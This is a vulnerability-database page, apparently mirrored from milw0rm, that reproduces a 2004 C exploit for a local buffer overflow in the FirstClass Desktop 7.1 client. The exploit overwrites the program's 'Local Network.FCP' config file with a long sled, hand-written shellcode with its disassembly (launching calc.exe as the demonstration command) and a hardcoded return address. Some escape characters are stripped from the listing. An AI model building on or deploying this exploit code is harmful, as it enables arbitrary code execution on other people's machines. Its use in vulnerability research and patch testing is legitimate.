FirstClass Desktop 7.1 – Local Buffer Overflow
| 漏洞ID | 1054440 | 漏洞类型 | |
| 发布时间 | 2004-04-07 | 更新时间 | 2004-04-07 |
![图片[1]-FirstClass Desktop 7.1 – Local Buffer Overflow-安全小百科](https://p0.ssl.qhimg.com/dr/29_50_100/t01bbbb9ac447dabd6a.png) CVE编号
|
N/A |
![图片[2]-FirstClass Desktop 7.1 – Local Buffer Overflow-安全小百科](https://p0.ssl.qhimg.com/dr/29_150_100/t01cd54df57948e31ea.png) CNNVD-ID
|
N/A |
| 漏洞平台 | Windows | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/***********************************************************
++++++++++++++++++++++++++++++++++++++++++++++++++++
####################################################
# FirstClass Desktop 7.1 (latest) buffer overflow exploit #
####################################################
Discovered and coded by I2S-LaB.
URL : http://www.I2S-LaB.com
contact : contact[at]I2S-LaB.com
++++++++++++++++++++++++++++++++++++++++++++++++++++
Compile it with cl.exe (VC++6)
***********************************************************/
#include <windows.h>
void main (int argc, char *argv[])
{
HANDLE FCP;
DWORD NumberOfBytesWritten;
unsigned char *p,
FC_FILE[] = "Local Network.FCP",
PATH[] = "C:\Program Files\FirstClass\Fcp\",
rawData[] =
/////////////////////////////////////////////////////////////////
// FC file data
/////////////////////////////////////////////////////////////////
"x43x4Fx4Ex4Ex54x59x50x45x20x3Dx20x38x0Dx0Ax46x43"
"x50x45x4Ex43x52x59x50x54x20x3Dx20x31x0Dx0Ax44x4C"
"x53x45x4Ex44x20x3Dx20x30x0Dx0Ax44x4Cx45x52x52x53"
"x20x3Dx20x30x0Dx0Ax44x4Cx52x43x56x20x3Dx20x30x0D"
"x0Ax4Dx44x4Dx44x42x47x20x3Dx20x30x0Dx0Ax53x4Cx44"
"x42x47x20x3Dx20x30x0Dx0Ax54x43x50x54x58x57x49x4E"
"x20x3Dx20x31x30x30x30x30x0Dx0Ax54x43x50x52x58x42"
"x55x46x20x3Dx20x31x30x30x30x30x0Dx0Ax54x43x50x52"
"x45x4Dx50x4Fx52x54x20x3Dx20x35x31x30x0Dx0Ax50x52"
"x4Fx58x59x50x4Fx52x54x20x3Dx20x22"
/////////////////////////////////////////////////////////////////
// MASS NOP LIKE : 'A' = inc ecx
/////////////////////////////////////////////////////////////////
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
/*
* Fcclient Specific shellcode [78 bytes]
*****************************************************************
:00401006 EB47 jmp 0040104F
:00401008 5A pop edx
:00401009 33FF xor edi, edi
:0040100B 8BEC mov ebp, esp
:0040100D 57 push edi
:0040100E 52 push edx
:0040100F 57 push edi
:00401010 6845786563 push 63657845
:00401015 4F dec edi
:00401016 81EFFFA89691 sub edi, 9196A8FF
:0040101C 57 push edi
:0040101D 68454C3332 push 32334C45
:00401022 684B45524E push 4E52454B
:00401027 8D5DE4 lea ebx, dword ptr [ebp-1C]
:0040102A 53 push ebx
:0040102B 33FF xor edi, edi
:0040102D 81EF589D9DFF sub edi, FF9D9D58
:00401033 FF17 call dword ptr [edi]
:00401035 8D5DED lea ebx, dword ptr [ebp-13]
:00401038 53 push ebx
:00401039 50 push eax
:0040103A 6681F75103 xor di, 0351
:0040103F 4F dec edi
:00401040 FF17 call dword ptr [edi]
:00401042 6A01 push 00000001
:00401044 FF75F8 push [ebp-08]
:00401047 FFD0 call eax
:00401049 6683EF4C sub di, 004C
:0040104D FFD7 call edi
:0040104F E8B4FFFFFF call 00401008
**********************************************************
*
*/
"xEBx47x5Ax33xFFx8BxECx57x52x57x68x45x78x65x63x4F"
"x81xEFxFFxA8x96x91x57x68x45x4Cx33x32x68x4Bx45x52"
"x4Ex8Dx5DxE4x53x33xFFx81xEFx58x9Dx9DxFFxFFx17x8D"
"x5DxEDx53x50x66x81xF7x51x03x4FxFFx17x6Ax01xFFx75"
"xF8xFFxD0x66x83xEFx4CxFFxD7xE8xB4xFFxFFxFF"
"calc.exe & " // to execute
////////////////////////////////////////////////////////////////
// OTHER DATA
////////////////////////////////////////////////////////////////
"x22x0Ax0Dx0Ax50x52x4Fx58x59x41x44x44x52x20"
"x3Dx20x22x41x41x41x41x41x41x41x41x41x41x45x45x45"
"x45x44x44"
/////////////////////////////////////////////////////////////////
// Return Address
/////////////////////////////////////////////////////////////////
"x5fx75xC2x00";
// Banner
printf ("###############################################n"
"FirstClass Client local buffer overflow Exploitn"
"###############################################n"
"Discovered & coded by I2S-LaB.nn"
"URL : http://www.I2S-LaB.comn"
"MAIL : Contact[at]I2S-LaB.comnn");
if ( !argv[1]) argv[1] = FC_FILE;
(argc > 2 ) ? (p = argv[2]) : (p = PATH);
if ( !(SetCurrentDirectory( p ) ) )
{
printf ("cannot set current directory to %snexiting.n", p);
ExitProcess(0);
}
if (!lstrcmpi (argv[1], "/restore") )
printf ("Restore the backup file...%sn",
CopyFile ("Local Network.BAK", FC_FILE, FALSE) ? "ok" : "Error : backup file not found!n");
else if ( !lstrcmpi (argv[1], "/run"))
{
printf ("Saving the Local Network file...%sn",
CopyFile (FC_FILE, "Local Network.BAK", TRUE) ? "ok" : "Backup file cannot be made");
printf ("Opening the Local Network file...");
FCP = CreateFile (FC_FILE, GENERIC_WRITE,
FILE_SHARE_WRITE, NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,NULL);
if (FCP == INVALID_HANDLE_VALUE)
{
printf ("cannot open Local Network file, exiting!n");
ExitProcess (-1);
}
printf ("oknWriting the Local Network File...%sn",
WriteFile (FCP, rawData, strlen (rawData) + 1, &NumberOfBytesWritten, NULL) ? "ok" : "Write file error!");
}
else printf ("usage : %s /RUN | /RESTORE [path to Local Network.FCP]nn"
"/RUN : launch the xploit against "Local Network.FCP"n"
"/RESTORE : Restore the previous "Local Network.FCP"nn"
"[path to Local Network.FCP] : Optional,ndefine the path of the "Local Network.FCP" to exploit.n"
"Default is %sn", argv[0], PATH);
}
// milw0rm.com [2004-04-07]相关推荐: Mirabilis ICQ Password Bypass Weakness
Mirabilis ICQ Password Bypass Weakness 漏洞ID 1099985 漏洞类型 Design Error 发布时间 2003-07-05 更新时间 2003-07-05 CVE编号 N/A CNNVD-ID N/A 漏洞平台 …
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666